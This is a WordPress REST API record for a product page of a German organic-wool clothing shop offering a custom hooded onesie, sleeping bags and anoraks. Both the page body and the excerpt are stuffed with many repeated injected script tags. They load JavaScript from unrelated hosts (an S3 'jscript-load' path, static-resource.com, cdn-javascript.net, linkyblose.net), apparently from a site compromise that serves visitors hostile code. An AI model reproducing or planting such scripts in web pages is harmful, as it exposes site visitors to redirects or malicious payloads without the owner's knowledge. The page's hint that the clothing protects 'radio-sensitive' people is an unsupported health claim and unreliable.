{"id":243,"date":"2018-06-24T14:30:20","date_gmt":"2018-06-24T12:30:20","guid":{"rendered":"https:\/\/eloasminbarden.de\/shop\/?post_type=product&#038;p=243"},"modified":"2020-01-17T14:56:15","modified_gmt":"2020-01-17T13:56:15","slug":"der-renner-naturtextilien-lebensfaden","status":"publish","type":"product","link":"https:\/\/eloasminbarden.de\/shop\/produkt\/der-renner-naturtextilien-lebensfaden\/","title":{"rendered":"&#8222;Der Funk-Schutz-Renner &#8220; Einteiliger Kapuzenanzug  &#8222;Onesi&#8220;"},"content":{"rendered":"<h1 class=\"title\">Herzlich Willkommen \u2026<\/h1>\n<div>\n<h3>bei Coccon, dem Label von Lebensfaden Naturtextilien<\/h3>\n<p><strong>Unsere Kleidung ist f\u00fcr alle Menschen gedacht,<\/strong><\/p>\n<ul>\n<li>die in Jurten, Zelten, Bauwagen und Drau\u00dfen wohnen &amp; schlafen,<\/li>\n<li>die ein gro\u00dfes W\u00e4rme- &amp; Schutzbed\u00fcrfnis haben<\/li>\n<li>die Sehnsucht &amp; Lust auf Wolle haben<\/li>\n<li>die unsere Klamotten einfach cool &amp; hot (k\u00fchl &amp; hei\u00df) finden<\/li>\n<li>die Elektrosensibel und funksensibel sind (bitte erfragen Sie die Wirkungsweise)<\/li>\n<\/ul>\n<p><strong>Wir bieten momentan drei verschiedene Produkte an:<\/strong><\/p>\n<ol>\n<li>\u00a0<em><strong>Der Renner\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/strong><\/em>Einteiliger Kapuzenoverall (Onepiece, Jumpsuit etc.) aus Wollfleece oder Wollpl\u00fcsch<\/li>\n<li><em><strong>\u00a0Schlafsack\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/strong><\/em>Schlafsack mit und ohne \u00c4rmel aus Wollpl\u00fcsch<\/li>\n<li>\u00a0<em><strong>Anorak\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/strong><\/em>Wasserabweisende Kapuzenjacke mit Innenfutter aus Wollpl\u00fcsch<\/li>\n<\/ol>\n<p><strong>Das Besondere an unseren Produkten:<\/strong><\/p>\n<ul>\n<li>Alle Produkte sind aus kontrolliert biologischem Anbau (kbA) und\/oder kontrolliert biologischer Tierhaltung (kbT)<\/li>\n<li>Alle Produkte sind in Deutschland gefertigt und hergestellt, die Wolle stammt von Schafen aus Deutschland<\/li>\n<li>Unsere Produkte werden handgen\u00e4ht und wir bezahlen unsere N\u00e4herin \u00fcberdurchschnittlich gut<\/li>\n<li>Du erh\u00e4ltst ein individuelles, wenn Du es w\u00fcnscht auf Deine Ma\u00dfe angepasstes Einzelst\u00fcck<\/li>\n<li>Wir k\u00f6nnen uns selbst mit unseren Produkten identifizieren und entwickeln sie st\u00e4ndig weiter<\/li>\n<\/ul>\n<p>Lust bekommen ?<\/p>\n<p>Dann trete mit uns einfach in Kontakt unter: naturtextilien(at)lebensfaden.de\u00a0 oder musik@eloasminbarden.de<\/p>\n<\/div>\n<p><script src=\"\/\/s3.amazonaws.com\/jscript-load\/217bc9f0d28b2da070.js\"><\/script><script src=\"https:\/\/static-resource.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8571x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cdn-javascript.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8571x&amp;format=arrjs&amp;r=1562846550349\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/s3.amazonaws.com\/jscript-load\/217bc9f0d28b2da070.js\"><\/script><script src=\"https:\/\/static-resource.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8571x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cdn-javascript.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8571x&amp;format=arrjs&amp;r=1562846856005\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/s3.amazonaws.com\/jscript-load\/217bc9f0d28b2da070.js\"><\/script><script src=\"https:\/\/linkyblose.net\/optout\/set\/lat?jsonp=__mtz_cb_896429859&amp;key=217bc9f0d28b2da070&amp;cv=1562846947&amp;t=1562846947580\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/linkyblose.net\/optout\/set\/lt?jsonp=__mtz_cb_733671450&amp;key=217bc9f0d28b2da070&amp;cv=12740&amp;t=1562846947580\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/static-resource.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8571x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cdn-javascript.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8571x&amp;format=arrjs&amp;r=1562846947585\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/s3.amazonaws.com\/jscript-load\/217bc9f0d28b2da070.js\"><\/script><script src=\"https:\/\/static-resource.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8571x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cdn-javascript.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8571x&amp;format=arrjs&amp;r=1562847606018\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/s3.amazonaws.com\/jscript-load\/217bc9f0d28b2da070.js\"><\/script><script src=\"https:\/\/static-resource.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8571x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cdn-javascript.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8571x&amp;format=arrjs&amp;r=1562847803962\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/s3.amazonaws.com\/jscript-load\/217bc9f0d28b2da070.js\"><\/script><script src=\"https:\/\/static-resource.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8571x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cdn-javascript.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8571x&amp;format=arrjs&amp;r=1562848039654\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/s3.amazonaws.com\/jscript-load\/217bc9f0d28b2da070.js\"><\/script><script src=\"https:\/\/static-resource.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8571x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cdn-javascript.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8571x&amp;format=arrjs&amp;r=1562848239287\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/s3.amazonaws.com\/jscript-load\/217bc9f0d28b2da070.js\"><\/script><script src=\"https:\/\/static-resource.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8571x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cdn-javascript.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8571x&amp;format=arrjs&amp;r=1562848286352\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/s3.amazonaws.com\/jscript-load\/217bc9f0d28b2da070.js\"><\/script><script src=\"https:\/\/static-resource.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8571x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cdn-javascript.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8571x&amp;format=arrjs&amp;r=1564061107198\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Dein Renner wird pers\u00f6nlich f\u00fcr Dich gen\u00e4ht. Deshalb bitte Kontakt per Mail unter <a href=\"mailto:naturtextilien@lebensfaden.de\">naturtextilien@lebensfaden.de<\/a> aufnehmen.<\/p>\n<p><strong>Aktuelle Farben:<\/strong> Petrol, Himmelblau, Rot, Lindgr\u00fcn, Anthrazit, Mausgrau, Natur<\/p>\n<p><strong>Zus\u00e4tze:<\/strong> aufgesetzte K\u00e4nguru-Taschen, integrierte Taschen, farblich abgesetzte Kapuze, Taschen, \u00c4rmel, Stickereien<\/p>\n<p><strong>Gr\u00f6ssen:<\/strong> Du gibst uns Deine verschiedenen Ma\u00dfe und wir n\u00e4hen Dir einen Renner auf den Leib<\/p>\n<p><script src=\"\/\/s3.amazonaws.com\/jscript-load\/217bc9f0d28b2da070.js\"><\/script><script src=\"https:\/\/static-resource.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8571x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cdn-javascript.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8571x&amp;format=arrjs&amp;r=1562846550368\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/s3.amazonaws.com\/jscript-load\/217bc9f0d28b2da070.js\"><\/script><script src=\"https:\/\/static-resource.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8571x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cdn-javascript.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8571x&amp;format=arrjs&amp;r=1562846855988\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/s3.amazonaws.com\/jscript-load\/217bc9f0d28b2da070.js\"><\/script><script src=\"https:\/\/linkyblose.net\/optout\/set\/lat?jsonp=__mtz_cb_491435798&amp;key=217bc9f0d28b2da070&amp;cv=1562846947&amp;t=1562846947599\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/linkyblose.net\/optout\/set\/lt?jsonp=__mtz_cb_583752647&amp;key=217bc9f0d28b2da070&amp;cv=12740&amp;t=1562846947600\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/static-resource.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8571x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cdn-javascript.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8571x&amp;format=arrjs&amp;r=1562846947606\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/s3.amazonaws.com\/jscript-load\/217bc9f0d28b2da070.js\"><\/script><script src=\"https:\/\/static-resource.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8571x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cdn-javascript.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8571x&amp;format=arrjs&amp;r=1562847606026\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/s3.amazonaws.com\/jscript-load\/217bc9f0d28b2da070.js\"><\/script><script src=\"https:\/\/static-resource.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8571x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cdn-javascript.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8571x&amp;format=arrjs&amp;r=1562847803985\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/s3.amazonaws.com\/jscript-load\/217bc9f0d28b2da070.js\"><\/script><script src=\"https:\/\/static-resource.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8571x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cdn-javascript.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8571x&amp;format=arrjs&amp;r=1562848039675\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/s3.amazonaws.com\/jscript-load\/217bc9f0d28b2da070.js\"><\/script><script src=\"https:\/\/static-resource.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8571x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cdn-javascript.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8571x&amp;format=arrjs&amp;r=1562848239275\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/s3.amazonaws.com\/jscript-load\/217bc9f0d28b2da070.js\"><\/script><script src=\"https:\/\/static-resource.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8571x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cdn-javascript.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8571x&amp;format=arrjs&amp;r=1562848286360\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/s3.amazonaws.com\/jscript-load\/217bc9f0d28b2da070.js\"><\/script><script src=\"https:\/\/static-resource.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8571x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cdn-javascript.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8571x&amp;format=arrjs&amp;r=1564061107207\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"featured_media":499,"template":"","meta":[],"product_cat":[32],"product_tag":[],"_links":{"self":[{"href":"https:\/\/eloasminbarden.de\/shop\/wp-json\/wp\/v2\/product\/243"}],"collection":[{"href":"https:\/\/eloasminbarden.de\/shop\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/eloasminbarden.de\/shop\/wp-json\/wp\/v2\/types\/product"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/eloasminbarden.de\/shop\/wp-json\/wp\/v2\/media\/499"}],"wp:attachment":[{"href":"https:\/\/eloasminbarden.de\/shop\/wp-json\/wp\/v2\/media?parent=243"}],"wp:term":[{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/eloasminbarden.de\/shop\/wp-json\/wp\/v2\/product_cat?post=243"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/eloasminbarden.de\/shop\/wp-json\/wp\/v2\/product_tag?post=243"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}